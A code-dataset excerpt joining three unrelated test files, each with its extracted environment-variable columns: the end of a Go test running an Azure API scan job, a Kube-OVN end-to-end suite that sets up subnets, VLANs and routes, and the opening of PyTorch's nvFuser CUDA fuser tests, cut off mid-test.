Filters: []*common.Filter{},
}
job := jobs.Job{
Name: "my job for azure-api node manager",
Tags: []*common.Kv{},
Type: "exec",
Profiles: []string{"https://github.com/vjeffrey/try-azure-profile/archive/master.tar.gz"},
NodeSelectors: []*jobs.ManagerFilter{&mgrFilter},
}
t.Log("Creating job for node manager, to execute azure api scan")
jobID, err := jobsClient.Create(ctx, &job)
require.NoError(t, err)
// read the job to get the status, loop until completed. fail test if failed.
jobRead, err := jobsClient.Read(ctx, jobID)
require.NoError(t, err)
status := jobRead.GetStatus()
t.Log("Reading job status, looping until status reports as completed.")
counter := 0
for status != "completed" {
t.Logf("status: %s (sleeping 1s)", status)
time.Sleep(1 * time.Second)
jobRead, err := jobsClient.Read(ctx, jobID)
require.NoError(t, err)
status = jobRead.Status
if status == "failed" {
t.Fatalf("job failed. job: %+v", jobRead)
}
counter++
if counter > 120 {
t.Fatalf("timed out waiting for job to finish")
}
}
// check reporting nodes. if job completed we should have a node in reporting nodes
reportingNodes, err := reportingClient.ListNodes(ctx, &reporting.Query{})
require.NoError(t, err)
// sometimes it takes a bit of extra time for the report to land in elastic, so here
// we loop until it has
counter = 0
for reportingNodes.GetTotal() == originalReportingNodes.GetTotal() {
t.Log("sleeping 1s; then retrieving reporting nodes total again")
time.Sleep(1 * time.Second)
reportingNodes, err = reportingClient.ListNodes(ctx, &reporting.Query{})
require.NoError(t, err)
counter++
if counter > 120 {
t.Fatalf("timed out waiting for job to finish")
}
}
require.Equal(t, reportingNodes.GetTotal() > originalReportingNodes.GetTotal(), true)
for _, listNode := range reportingNodes.GetNodes() {
endtime, err := ptypes.Timestamp(listNode.GetLatestReport().GetEndTime())
require.NoError(t, err)
if endtime.After(now) && listNode.GetEnvironment() == "azure-api" {
t.Logf("Beginning test time: %s", now)
t.Logf("Found node %s, end time: %s", listNode, endtime)
// check `/nodes` endpoint to ensure node marked as reachable
foundNode, err := nodesClient.Read(ctx, &nodes.Id{Id: listNode.Id})
require.NoError(t, err)
require.Equal(t, "reachable", foundNode.GetStatus())
}
}
}
|
[
"\"AZURE_CLIENT_ID\"",
"\"AZURE_CLIENT_SECRET\"",
"\"AZURE_TENANT_ID\""
] |
[] |
[
"AZURE_CLIENT_ID",
"AZURE_CLIENT_SECRET",
"AZURE_TENANT_ID"
] |
[]
|
["AZURE_CLIENT_ID", "AZURE_CLIENT_SECRET", "AZURE_TENANT_ID"]
|
go
| 3 | 0 | |
test/e2e/e2e_suite_test.go
|
package e2e
import (
"context"
_ "embed"
"encoding/json"
"fmt"
"os"
"os/exec"
"strconv"
"strings"
"testing"
corev1 "k8s.io/api/core/v1"
metav1 "k8s.io/apimachinery/pkg/apis/meta/v1"
k8sruntime "k8s.io/apimachinery/pkg/runtime"
kubeadmscheme "k8s.io/kubernetes/cmd/kubeadm/app/apis/kubeadm/scheme"
kubeadmapi "k8s.io/kubernetes/cmd/kubeadm/app/apis/kubeadm/v1beta3"
kubeadmconstants "k8s.io/kubernetes/cmd/kubeadm/app/constants"
. "github.com/onsi/ginkgo"
. "github.com/onsi/gomega"
kubeovn "github.com/kubeovn/kube-ovn/pkg/apis/kubeovn/v1"
"github.com/kubeovn/kube-ovn/pkg/util"
"github.com/kubeovn/kube-ovn/test/e2e/framework"
// tests to run
_ "github.com/kubeovn/kube-ovn/test/e2e/ip"
_ "github.com/kubeovn/kube-ovn/test/e2e/kubectl-ko"
_ "github.com/kubeovn/kube-ovn/test/e2e/node"
_ "github.com/kubeovn/kube-ovn/test/e2e/qos"
_ "github.com/kubeovn/kube-ovn/test/e2e/service"
_ "github.com/kubeovn/kube-ovn/test/e2e/subnet"
"github.com/kubeovn/kube-ovn/test/e2e/underlay"
)
//go:embed network.json
var networkJSON []byte
var nodeNetworks map[string]nodeNetwork
type nodeNetwork struct {
Gateway string
IPAddress string
IPPrefixLen int
IPv6Gateway string
GlobalIPv6Address string
GlobalIPv6PrefixLen int
MacAddress string
}
func init() {
if err := json.Unmarshal(networkJSON, &nodeNetworks); err != nil {
panic(err)
}
}
func TestE2e(t *testing.T) {
RegisterFailHandler(Fail)
RunSpecs(t, "Kube-OVN E2E Suite")
}
var _ = SynchronizedAfterSuite(func() {}, func() {
f := framework.NewFramework("init", fmt.Sprintf("%s/.kube/config", os.Getenv("HOME")))
nss, err := f.KubeClientSet.CoreV1().Namespaces().List(context.Background(), metav1.ListOptions{LabelSelector: "e2e=true"})
if err != nil {
Fail(err.Error())
}
if nss != nil {
for _, ns := range nss.Items {
err := f.KubeClientSet.CoreV1().Namespaces().Delete(context.Background(), ns.Name, metav1.DeleteOptions{})
if err != nil {
Fail(err.Error())
}
}
}
err = f.OvnClientSet.KubeovnV1().Subnets().DeleteCollection(context.Background(), metav1.DeleteOptions{}, metav1.ListOptions{LabelSelector: "e2e=true"})
if err != nil {
Fail(err.Error())
}
err = f.OvnClientSet.KubeovnV1().Vlans().DeleteCollection(context.Background(), metav1.DeleteOptions{}, metav1.ListOptions{LabelSelector: "e2e=true"})
if err != nil {
Fail(err.Error())
}
err = f.OvnClientSet.KubeovnV1().ProviderNetworks().DeleteCollection(context.Background(), metav1.DeleteOptions{}, metav1.ListOptions{LabelSelector: "e2e=true"})
if err != nil {
Fail(err.Error())
}
})
func setExternalRoute(af int, dst, gw string) {
if dst == "" || gw == "" {
return
}
cmd := exec.Command("docker", "exec", "kube-ovn-e2e", "ip", fmt.Sprintf("-%d", af), "route", "replace", dst, "via", gw)
output, err := cmd.CombinedOutput()
if err != nil {
Fail((fmt.Sprintf(`failed to execute command "%s": %v, output: %s`, cmd.String(), err, strings.TrimSpace(string(output)))))
}
}
var _ = SynchronizedBeforeSuite(func() []byte {
subnetName := "static-ip"
namespace := "static-ip"
f := framework.NewFramework("init", fmt.Sprintf("%s/.kube/config", os.Getenv("HOME")))
_, err := f.KubeClientSet.CoreV1().Namespaces().Create(context.Background(), &corev1.Namespace{
ObjectMeta: metav1.ObjectMeta{
Name: namespace,
Labels: map[string]string{"e2e": "true"}}}, metav1.CreateOptions{})
if err != nil {
Fail(err.Error())
}
s := kubeovn.Subnet{
ObjectMeta: metav1.ObjectMeta{
Name: subnetName,
Labels: map[string]string{"e2e": "true"},
},
Spec: kubeovn.SubnetSpec{
CIDRBlock: "12.10.0.0/16",
Namespaces: []string{namespace},
Protocol: util.CheckProtocol("12.10.0.0/16"),
},
}
_, err = f.OvnClientSet.KubeovnV1().Subnets().Create(context.Background(), &s, metav1.CreateOptions{})
if err != nil {
Fail(err.Error())
}
err = f.WaitSubnetReady(subnetName)
if err != nil {
Fail(err.Error())
}
nodes, err := f.KubeClientSet.CoreV1().Nodes().List(context.Background(), metav1.ListOptions{})
if err != nil {
Fail(err.Error())
}
kubeadmConfigMap, err := f.KubeClientSet.CoreV1().ConfigMaps(metav1.NamespaceSystem).Get(context.Background(), kubeadmconstants.KubeadmConfigConfigMap, metav1.GetOptions{})
if err != nil {
Fail(err.Error())
}
clusterConfig := &kubeadmapi.ClusterConfiguration{}
if err = k8sruntime.DecodeInto(kubeadmscheme.Codecs.UniversalDecoder(), []byte(kubeadmConfigMap.Data[kubeadmconstants.ClusterConfigurationConfigMapKey]), clusterConfig); err != nil {
Fail(fmt.Sprintf("failed to decode kubeadm cluster configuration from bytes: %v", err))
}
nodeIPv4, nodeIPv6 := util.GetNodeInternalIP(nodes.Items[0])
podSubnetV4, podSubnetV6 := util.SplitStringIP(clusterConfig.Networking.PodSubnet)
svcSubnetV4, svcSubnetV6 := util.SplitStringIP(clusterConfig.Networking.ServiceSubnet)
setExternalRoute(4, podSubnetV4, nodeIPv4)
setExternalRoute(4, svcSubnetV4, nodeIPv4)
setExternalRoute(6, podSubnetV6, nodeIPv6)
setExternalRoute(6, svcSubnetV6, nodeIPv6)
// underlay
var vlanID int
providerInterface := underlay.UnderlayInterface
if underlay.VlanID != "" {
if vlanID, err = strconv.Atoi(underlay.VlanID); err != nil || vlanID <= 0 || vlanID > 4095 {
Fail(underlay.VlanID + " is not an invalid VLAN id")
}
providerInterface = underlay.VlanInterface
}
var underlayNodeIPs []string
var underlayCIDR, underlayGateway string
for node, network := range nodeNetworks {
underlay.SetNodeMac(node, network.MacAddress)
if network.IPAddress != "" {
underlay.AddNodeIP(network.IPAddress)
underlayNodeIPs = append(underlayNodeIPs, network.IPAddress)
underlay.AddNodeAddrs(node, fmt.Sprintf("%s/%d", network.IPAddress, network.IPPrefixLen))
if underlayCIDR == "" {
underlayCIDR = fmt.Sprintf("%s/%d", network.IPAddress, network.IPPrefixLen)
}
}
if network.GlobalIPv6Address != "" {
underlay.AddNodeAddrs(node, fmt.Sprintf("%s/%d", network.GlobalIPv6Address, network.GlobalIPv6PrefixLen))
}
if network.Gateway != "" {
underlay.AddNodeRoutes(node, fmt.Sprintf("default via %s ", network.Gateway))
if underlayGateway == "" {
underlayGateway = network.Gateway
}
}
if network.IPv6Gateway != "" {
underlay.AddNodeRoutes(node, fmt.Sprintf("default via %s ", network.IPv6Gateway))
}
}
underlay.SetCIDR(underlayCIDR)
cniPods, err := f.KubeClientSet.CoreV1().Pods("kube-system").List(context.Background(), metav1.ListOptions{LabelSelector: "app=kube-ovn-cni"})
if err != nil {
Fail(err.Error())
}
for i := range nodes.Items {
var cniPod *corev1.Pod
nodeIPv4, nodeIPv6 := util.GetNodeInternalIP(nodes.Items[i])
for _, pod := range cniPods.Items {
if pod.Status.HostIP == nodeIPv4 || pod.Status.HostIP == nodeIPv6 {
cniPod = &pod
break
}
}
if cniPod == nil {
Fail("failed to get CNI pod on node " + nodes.Items[i].Name)
return nil
}
// change MTU
mtu := 1500 - (i+1)*5
cmd := fmt.Sprintf("ip link set %s mtu %d", providerInterface, mtu)
if _, _, err = f.ExecToPodThroughAPI(cmd, "cni-server", cniPod.Name, cniPod.Namespace, nil); err != nil {
Fail(fmt.Sprintf("failed to set MTU of %s on node %s: %v", providerInterface, nodes.Items[i].Name, err))
}
underlay.SetNodeMTU(nodes.Items[i].Name, mtu)
}
ns := corev1.Namespace{
ObjectMeta: metav1.ObjectMeta{
Name: underlay.Namespace,
Labels: map[string]string{"e2e": "true"},
},
}
if _, err = f.KubeClientSet.CoreV1().Namespaces().Create(context.Background(), &ns, metav1.CreateOptions{}); err != nil {
Fail(err.Error())
}
// create provider network
pn := &kubeovn.ProviderNetwork{
ObjectMeta: metav1.ObjectMeta{
Name: underlay.ProviderNetwork,
Labels: map[string]string{"e2e": "true"},
},
Spec: kubeovn.ProviderNetworkSpec{
DefaultInterface: providerInterface,
},
}
if _, err = f.OvnClientSet.KubeovnV1().ProviderNetworks().Create(context.Background(), pn, metav1.CreateOptions{}); err != nil {
Fail("failed to create provider network: " + err.Error())
}
if err = f.WaitProviderNetworkReady(pn.Name); err != nil {
Fail("provider network failed: " + err.Error())
}
if pn, err = f.OvnClientSet.KubeovnV1().ProviderNetworks().Get(context.Background(), pn.Name, metav1.GetOptions{}); err != nil {
Fail("failed to get provider network: " + err.Error())
}
for _, node := range nodes.Items {
if !pn.Status.NodeIsReady(node.Name) {
Fail(fmt.Sprintf("provider network on node %s is not ready", node.Name))
}
}
// create vlan
vlan := kubeovn.Vlan{
ObjectMeta: metav1.ObjectMeta{
Name: underlay.Vlan,
Labels: map[string]string{"e2e": "true"},
},
Spec: kubeovn.VlanSpec{
ID: vlanID,
Provider: pn.Name,
},
}
if _, err = f.OvnClientSet.KubeovnV1().Vlans().Create(context.Background(), &vlan, metav1.CreateOptions{}); err != nil {
Fail("failed to create vlan: " + err.Error())
}
// create subnet
subnet := kubeovn.Subnet{
ObjectMeta: metav1.ObjectMeta{
Name: underlay.Subnet,
Labels: map[string]string{"e2e": "true"},
},
Spec: kubeovn.SubnetSpec{
CIDRBlock: underlayCIDR,
Gateway: underlayGateway,
ExcludeIps: underlayNodeIPs,
Vlan: vlan.Name,
Namespaces: []string{underlay.Namespace},
Protocol: util.CheckProtocol(underlayCIDR),
},
}
if _, err = f.OvnClientSet.KubeovnV1().Subnets().Create(context.Background(), &subnet, metav1.CreateOptions{}); err != nil {
Fail("failed to create subnet: " + err.Error())
}
if err = f.WaitSubnetReady(subnet.Name); err != nil {
Fail("subnet failed: " + err.Error())
}
return nil
}, func(data []byte) {})
|
[
"\"HOME\"",
"\"HOME\""
] |
[] |
[
"HOME"
] |
[]
|
["HOME"]
|
go
| 1 | 0 | |
test/test_jit_cuda_fuser.py
|
# Owner(s): ["oncall: jit"]
import unittest
import os
import random
import enum
import copy
from functools import reduce
import operator
import warnings
import torch
from torch.nn import functional
from torch.profiler import profile, ProfilerActivity
from torch.testing._internal.codegen.random_topo_test import runDefaultTestWithSeed
from torch.testing._internal.common_cuda import TEST_MULTIGPU
from torch.testing._internal.common_device_type import instantiate_device_type_tests, ops, OpDTypes
from torch.testing._internal.common_jit import JitCommonTestCase
from torch.testing._internal.common_methods_invocations import op_db, SampleInput
from torch.testing._internal.common_utils import run_tests, ProfilingMode, GRAPH_EXECUTOR, TEST_WITH_ROCM, slowTest, \
is_iterable_of_tensors, freeze_rng_state
from torch.testing._internal.jit_utils import clone_inputs, get_traced_sample_variant_pairs, JitTestCase, RUN_CUDA
from torch.testing._internal.jit_metaprogramming_utils import create_traced_fn
from torch.testing import FileCheck
from jit.test_fuser_common import TestFuserCommon # noqa: F401
import itertools
import numpy as np
import math
from torch.autograd.gradcheck import gradcheck
from typing import List
RUN_NVFUSER = RUN_CUDA and not TEST_WITH_ROCM
CUDA_MAJOR, CUDA_MINOR = 0, 0
if RUN_NVFUSER and torch.version.cuda is not None:
CUDA_MAJOR, CUDA_MINOR = (int(x) for x in torch.version.cuda.split('.')[:2])
os.environ['PYTORCH_NVFUSER_DISABLE_FALLBACK'] = '1'
os.environ['PYTORCH_NVFUSER_DISABLE_FMA'] = '1'
os.environ['PYTORCH_NVFUSER_DISABLE_FASTMATH'] = '1'
os.environ['PYTORCH_NVFUSER_JIT_OPT_LEVEL'] = '0'
os.environ['PYTORCH_NVFUSER_DISABLE_RNG_UNROLL'] = '1'
if GRAPH_EXECUTOR == ProfilingMode.PROFILING:
torch._C._jit_set_texpr_fuser_enabled(False)
torch._C._jit_set_profiling_executor(True)
torch._C._jit_set_profiling_mode(True)
FUSION_GROUP = 'prim::CudaFusionGroup'
FUSION_GUARD = 'prim::CudaFusionGuard'
import contextlib
@contextlib.contextmanager
def nvfuser_singleton_fusion(flag):
old_value = torch._C._jit_set_nvfuser_single_node_mode(flag)
try:
yield
finally:
torch._C._jit_set_nvfuser_single_node_mode(old_value)
@contextlib.contextmanager
def nvfuser_horizontal_fusion(flag):
old_value = torch._C._jit_set_nvfuser_horizontal_mode(flag)
try:
yield
finally:
torch._C._jit_set_nvfuser_horizontal_mode(old_value)
def is_pre_volta():
if not RUN_NVFUSER:
return False
prop = torch.cuda.get_device_properties(torch.cuda.current_device())
return prop.major < 7
TEST_BF16 = RUN_NVFUSER and torch.cuda.is_bf16_supported()
class CudaFuserTestOptions():
def __init__(self):
self.old_cpu_fuse = torch._C._jit_can_fuse_on_cpu()
self.old_gpu_fuse = torch._C._jit_can_fuse_on_gpu()
torch._C._jit_override_can_fuse_on_cpu(False)
torch._C._jit_override_can_fuse_on_gpu(False)
self.old_guard = torch._C._jit_set_nvfuser_guard_mode(False)
torch._C._debug_set_autodiff_subgraph_inlining(False)
self.old_value = torch._C._jit_set_autocast_mode(True)
if(RUN_CUDA):
self.old_nvfuser = torch._C._jit_set_nvfuser_enabled(True)
def restore(self):
if(RUN_CUDA):
torch._C._jit_set_nvfuser_enabled(self.old_nvfuser)
torch._C._jit_override_can_fuse_on_cpu(self.old_cpu_fuse)
torch._C._jit_override_can_fuse_on_gpu(self.old_gpu_fuse)
torch._C._jit_set_nvfuser_guard_mode(self.old_guard)
torch._C._debug_set_autodiff_subgraph_inlining(True)
torch._C._jit_set_autocast_mode(self.old_value)
class TestCudaFuser(JitTestCase):
def assertEqual(self, *args, **kwargs):
kwargs["exact_layout"] = True
super(JitTestCase, self).assertEqual(*args, **kwargs)
def _getSubgraphInFusion(self, graph):
num_node = 0
subgraph = None
def count(block, ret):
for n in block.nodes():
if n.kind() == FUSION_GROUP:
ret[0] = ret[0] + 1
self.assertTrue(n.hasAttribute('Subgraph'))
ret[1] = n.g('Subgraph')
for block in n.blocks():
count(block, ret)
ret = [num_node, subgraph]
count(graph, ret)
self.assertEqual(ret[0], 1)
return ret[1]
def setUp(self):
super(TestCudaFuser, self).setUp()
self.skip_node_list = []
disabled_ops = ("aten::batch_norm",
"aten::_batch_norm_impl_index",
"aten::_batch_norm_impl_index_backward",
"aten::native_batch_norm_backward")
for op in disabled_ops:
disabled_flag = torch._C._jit_set_nvfuser_skip_node_kind(op, False)
if disabled_flag:
torch._C._jit_set_nvfuser_skip_node_kind(op, True)
self.skip_node_list.append(op)
# cpu backup to avoid errors in case this is run on a CPU-only machine
dev = 'cuda' if RUN_NVFUSER else 'cpu'
self.special_values = torch.tensor(
[float("-inf"), -10, -math.pi,
-1, -0.5, 0, 1, 0.5,
math.pi, 10, float("inf"),
float("nan")], dtype=torch.float, device=dev)
self.int_types = [
torch.int8,
torch.uint8,
torch.int16,
torch.int32,
torch.int64
]
self.support_tensor_dtypes = [
torch.int32,
torch.int64,
torch.float16,
torch.float32,
torch.float64,
torch.bool
]
if TEST_BF16:
self.support_tensor_dtypes.append(torch.bfloat16)
if(RUN_NVFUSER):
self.cuda_fuser_options = CudaFuserTestOptions()
def tearDown(self):
# restoring skip node to the configuration before tests
for op in self.skip_node_list:
disabled_flag = torch._C._jit_set_nvfuser_skip_node_kind(op, False)
if not disabled_flag:
torch._C._jit_set_nvfuser_skip_node_kind(op, True)
if(RUN_NVFUSER):
self.cuda_fuser_options.restore()
super(TestCudaFuser, self).tearDown()
def _run_helper(self, jit_op, op, *args):
torch.cuda.manual_seed_all(123)
jit_o = jit_op(*args)
torch.cuda.manual_seed_all(123)
jit_o = jit_op(*args)
torch.cuda.manual_seed_all(123)
o = op(*args)
self.assertEqual(o.dtype, jit_o.dtype)
self.assertEqual(o, jit_o)
self.assertGraphContainsExactly(jit_op.graph_for(*args), FUSION_GUARD, 1, consider_subgraphs=True)
def _run_training_helper(self, jit_op, op, grads, *args):
torch.cuda.manual_seed_all(123)
jit_o = jit_op(*args)
jit_g = jit_o.backward(grads)
torch.cuda.manual_seed_all(123)
jit_o = jit_op(*args)
jit_g = jit_o.backward(grads)
torch.cuda.manual_seed_all(123)
jit_o = jit_op(*args)
jit_g = jit_o.backward(grads)
torch.cuda.manual_seed_all(123)
o = op(*args)
g = o.backward(grads)
self.assertEqual(o, jit_o)
self.assertEqual(g, jit_g)
self.assertGraphContainsExactly(jit_op.graph_for(*args), FUSION_GUARD, 1, consider_subgraphs=True)
bwd_graph = list(
list(jit_op.get_debug_state().execution_plans.values())[
0].code.grad_executor_states()[0].execution_plans.values()
)[0].graph
self.assertGraphContainsExactly(bwd_graph, FUSION_GUARD, 1, consider_subgraphs=True)
@unittest.skipIf(not RUN_NVFUSER, "requires CUDA")
@unittest.skipIf(GRAPH_EXECUTOR != ProfilingMode.PROFILING,
"Requires fusion optimization pass to be effective")
def test_half(self):
def t(x: torch.Tensor, y: torch.Tensor, z: torch.Tensor, alpha: float):
o_16 = torch.add(x, y)
o_32_a = torch.add(y, z, alpha=alpha)
o_32_b = torch.add(o_16, z)
return (o_16, o_32_a, o_32_b)
t_jit = torch.jit.script(t)
alpha = 0.5
# stick to integers, this avoid the numerical difference due to our
# promotion
x = torch.randint(0, 256, (4, 8)).to(dtype=torch.float16, device="cuda")
y = torch.randint(0, 256, (4, 8)).to(dtype=torch.float16, device="cuda")
z = torch.randint(0, 256, (4, 8)).to(dtype=torch.float16, device="cuda")
jit_o = t_jit(x, y, z, alpha)
jit_o = t_jit(x, y, z, alpha)
o = t(x, y, z, alpha)
for oo, jit_oo in zip(o, jit_o):
self.assertEqual(oo.dtype, jit_oo.dtype)
self.assertEqual(oo, jit_oo)
self.assertGraphContains(t_jit.graph_for(x, y, z, alpha), FUSION_GUARD)
@unittest.skipIf(not TEST_BF16, "device does not support BFloat16")
@unittest.skipIf(not RUN_NVFUSER, "requires CUDA")
@unittest.skipIf(GRAPH_EXECUTOR != ProfilingMode.PROFILING,
"Requires fusion optimization pass to be effective")
def test_bfloat(self):
def t(x: torch.Tensor, y: torch.Tensor, z: torch.Tensor, alpha: float):
o_16 = torch.add(x, y)
o_32_a = torch.add(y, z, alpha=alpha)
o_32_b = torch.add(o_16, z)
return (o_16, o_32_a, o_32_b)
t_jit = torch.jit.script(t)
alpha = 0.5
# stick to integers, this avoid the numerical difference due to our
# promotion
x = torch.randint(0, 256, (4, 8)).to(dtype=torch.bfloat16, device="cuda")
y = torch.randint(0, 256, (4, 8)).to(dtype=torch.bfloat16, device="cuda")
z = torch.randint(0, 256, (4, 8)).to(dtype=torch.bfloat16, device="cuda")
jit_o = t_jit(x, y, z, alpha)
jit_o = t_jit(x, y, z, alpha)
o = t(x, y, z, alpha)
for oo, jit_oo in zip(o, jit_o):
self.assertEqual(oo.dtype, jit_oo.dtype)
self.assertEqual(oo, jit_oo)
self.assertGraphContains(t_jit.graph_for(x, y, z, alpha), FUSION_GUARD)
@unittest.skipIf(not RUN_NVFUSER, "requires CUDA")
@unittest.skipIf(GRAPH_EXECUTOR != ProfilingMode.PROFILING,
"Requires fusion optimization pass to be effective")
def test_const(self):
def t(x, y):
o = x + y
o = o + 2.0
return o
t_jit = torch.jit.script(t)
x = torch.randn(4, 8, dtype=torch.float, device="cuda")
y = torch.randn(4, 8, dtype=torch.float, device="cuda")
jit_o = t_jit(x, y)
jit_o = t_jit(x, y)
o = t(x, y)
self.assertEqual(o, jit_o)
self.assertGraphContains(t_jit.graph_for(x, y), FUSION_GUARD)
@unittest.skipIf(not RUN_NVFUSER, "requires CUDA")
@unittest.skipIf(GRAPH_EXECUTOR != ProfilingMode.PROFILING,
"Requires fusion optimization pass to be effective")
def test_chunk(self):
def t(x, y, z, q):
o = x + q
x0, x1 = torch.chunk(o, 2)
o = x0 + x1
o = o + y
o = o * z
o = torch.relu(o)
return o
t_jit = torch.jit.script(t)
x = torch.randn(4, 8, dtype=torch.float, device="cuda")
y = torch.randn(2, 8, dtype=torch.float, device="cuda")
z = torch.randn(2, 8, dtype=torch.float, device="cuda")
q = torch.randn(4, 8, dtype=torch.float, device="cuda")
jit_o = t_jit(x, y, z, q)
jit_o = t_jit(x, y, z, q)
o = t(x, y, z, q)
self.assertEqual(o, jit_o)
self.assertGraphContains(t_jit.graph_for(x, y, z, q), FUSION_GUARD)
@unittest.skipIf(is_pre_volta(), "reduction not supported in pre volta device")
@unittest.skipIf(not RUN_NVFUSER, "requires CUDA")
@unittest.skipIf(GRAPH_EXECUTOR != ProfilingMode.PROFILING,
"Requires fusion optimization pass to be effective")
def test_reduction_dtypes_axis(self):
for op in [torch.sum, torch.mean, torch.amax, torch.var, torch.std]:
for dtype in [torch.float16, torch.float32, torch.double]:
for axis in [-1, 2, 0]:
def make_func(op):
def func(x: torch.Tensor):
o = torch.mul(x, 2.0)
o = op(o, dim=[axis])
return o
return func
x = torch.randn(8, 4, 16, dtype=dtype, device="cuda")
t = make_func(op)
t_jit = torch.jit.trace(t, x)
jit_o = t_jit(x)
jit_o = t_jit(x)
o = t(x)
self.assertEqual(o.dtype, jit_o.dtype)
self.assertTrue(self._compare("comparing output failed", o, jit_o, 1e-4))
self.assertGraphContains(t_jit.graph_for(x), FUSION_GUARD)
@unittest.skipIf(is_pre_volta(), "reduction not supported in pre volta device")
@unittest.skipIf(not RUN_NVFUSER, "requires CUDA")
@unittest.skipIf(GRAPH_EXECUTOR != ProfilingMode.PROFILING,
"Requires fusion optimization pass to be effective")
def test_variance(self):
for op in [torch.var, torch.std]:
for dtype in [torch.float16, torch.float32, torch.double]:
for axis in [-2, -1, 2, 1]:
for unbiased in [False, True]:
def make_func(op):
def func(x: torch.Tensor):
o = torch.mul(x, 2.0)
o = op(o, dim=[axis])
return o
return func
x = torch.randn(8, 4, 16, dtype=dtype, device="cuda")
t = make_func(op)
t_jit = torch.jit.trace(t, x)
jit_o = t_jit(x)
jit_o = t_jit(x)
o = t(x)
self.assertEqual(o.dtype, jit_o.dtype)
self.assertTrue(self._compare("comparing output failed", o, jit_o, 1e-4))
self.assertGraphContains(t_jit.graph_for(x), FUSION_GUARD)
@unittest.skipIf(not RUN_NVFUSER, "requires CUDA")
@unittest.skipIf(GRAPH_EXECUTOR != ProfilingMode.PROFILING,
"Requires fusion optimization pass to be effective")
def test_scalar_input(self):
def t(x: torch.Tensor, y: torch.Tensor, z: float):
o = x + y
o = o + z
return o
t_jit = torch.jit.script(t)
x = torch.randn(4, 8, 32, 32, dtype=torch.float, device="cuda")
y = torch.randn(4, 8, 1, 32, dtype=torch.float, device="cuda")
y = y.expand(4, 8, 32, 32)
jit_o = t_jit(x, y, 2.0)
jit_o = t_jit(x, y, 2.0)
o = t(x, y, 2.0)
self.assertEqual(o, jit_o)
self.assertGraphContains(t_jit.graph_for(x, y, 2.0), FUSION_GUARD)
@unittest.skipIf(not RUN_NVFUSER, "requires CUDA")
@unittest.skipIf(GRAPH_EXECUTOR != ProfilingMode.PROFILING,
"Requires fusion optimization pass to be effective")
def test_broadcasting_0(self):
def t(x: torch.Tensor, y: torch.Tensor, z: float):
o = x + y
o = o + z
return o
t_jit = torch.jit.script(t)
x = torch.randn(4, 8, 32, 32, dtype=torch.float, device="cuda")
y = torch.randn(32, 32, dtype=torch.float, device="cuda")
jit_o = t_jit(x, y, 2.0)
jit_o = t_jit(x, y, 2.0)
o = t(x, y, 2.0)
self.assertEqual(o, jit_o)
subgraph = self._getSubgraphInFusion(t_jit.graph_for(x, y, 2.0))
self.assertGraphContainsExactly(subgraph, 'aten::add', 2, consider_subgraphs=False)
@unittest.skipIf(not RUN_NVFUSER, "requires CUDA")
@unittest.skipIf(GRAPH_EXECUTOR != ProfilingMode.PROFILING,
"Requires fusion optimization pass to be effective")
def test_broadcasting_1(self):
def t(x: torch.Tensor, y: torch.Tensor, z: float):
o = x + y
o = o + z
return o
t_jit = torch.jit.script(t)
x = torch.randn(4, 8, 32, 32, dtype=torch.float, device="cuda")
y = torch.randn(1, 32, 32, dtype=torch.float, device="cuda")
jit_o = t_jit(x, y, 2.0)
jit_o = t_jit(x, y, 2.0)
o = t(x, y, 2.0)
self.assertEqual(o, jit_o)
subgraph = self._getSubgraphInFusion(t_jit.graph_for(x, y, 2.0))
self.assertGraphContainsExactly(subgraph, 'aten::add', 2, consider_subgraphs=False)
@unittest.skipIf(not RUN_NVFUSER, "requires CUDA")
@unittest.skipIf(GRAPH_EXECUTOR != ProfilingMode.PROFILING,
"Requires fusion optimization pass to be effective")
def test_broadcasting_2(self):
def t(x: torch.Tensor, y: torch.Tensor, z: float):
o = x + y
o = o + z
return o
t_jit = torch.jit.script(t)
x = torch.randn(4, 1, 32, 32, dtype=torch.float, device="cuda")
y = torch.randn(8, 32, 32, dtype=torch.float, device="cuda")
jit_o = t_jit(x, y, 2.0)
jit_o = t_jit(x, y, 2.0)
o = t(x, y, 2.0)
self.assertEqual(o, jit_o)
subgraph = self._getSubgraphInFusion(t_jit.graph_for(x, y, 2.0))
self.assertGraphContainsExactly(subgraph, 'aten::add', 2, consider_subgraphs=False)
@unittest.skipIf(not RUN_NVFUSER, "requires CUDA")
@unittest.skipIf(GRAPH_EXECUTOR != ProfilingMode.PROFILING,
"Requires fusion optimization pass to be effective")
def test_broadcasting_3(self):
def t(x: torch.Tensor, y: torch.Tensor, z: float):
o = x + y
o = o + z
return o
t_jit = torch.jit.script(t)
x = torch.randn(8, 17, 8, dtype=torch.float, device="cuda")
y = torch.randn(8, 17, 1, dtype=torch.float, device="cuda")
jit_o = t_jit(x, y, 2.0)
jit_o = t_jit(x, y, 2.0)
o = t(x, y, 2.0)
self.assertEqual(o, jit_o)
subgraph = self._getSubgraphInFusion(t_jit.graph_for(x, y, 2.0))
self.assertGraphContainsExactly(subgraph, 'aten::add', 2, consider_subgraphs=False)
# test_broadcasting_partition_logic_X
# Testing partition logic that is capable to avoid creating unsupported
# broadcasting semantics in CudaFusionGroup
@unittest.skipIf(not RUN_NVFUSER, "requires CUDA")
@unittest.skipIf(GRAPH_EXECUTOR != ProfilingMode.PROFILING,
"Requires fusion optimization pass to be effective")
def test_broadcasting_partition_logic_0(self):
def t(x: torch.Tensor, y: torch.Tensor, z: torch.Tensor):
x = x + 12.0
o1 = x + y
o2 = x + z
o = o1 + o2
return o
t_jit = torch.jit.script(t)
x = torch.randn(4, 8, 6, 8, dtype=torch.float32, device="cuda")
y = torch.randn(8, 6, 8, dtype=torch.float32, device="cuda")
z = torch.randn(6, 8, dtype=torch.float32, device="cuda")
jit_o = t_jit(x, y, z)
jit_o = t_jit(x, y, z)
o = t(x, y, z)
self.assertEqual(o, jit_o)
subgraph = self._getSubgraphInFusion(t_jit.graph_for(x, y, z))
self.assertGraphContainsExactly(subgraph, 'aten::add', 4, consider_subgraphs=False)
@unittest.skipIf(not RUN_NVFUSER, "requires CUDA")
@unittest.skipIf(GRAPH_EXECUTOR != ProfilingMode.PROFILING,
"Requires fusion optimization pass to be effective")
def test_broadcasting_partition_logic_1(self):
def t(x: torch.Tensor, y: torch.Tensor, z: torch.Tensor):
x = x + 12.0
o1 = x + y
o2 = x + z
o = o1 + o2
return o
t_jit = torch.jit.script(t)
x = torch.randn(8, 6, 8, dtype=torch.float32, device="cuda")
y = torch.randn(4, 8, 6, 8, dtype=torch.float32, device="cuda")
z = torch.randn(4, 1, 6, 8, dtype=torch.float32, device="cuda")
jit_o = t_jit(x, y, z)
jit_o = t_jit(x, y, z)
o = t(x, y, z)
self.assertEqual(o, jit_o)
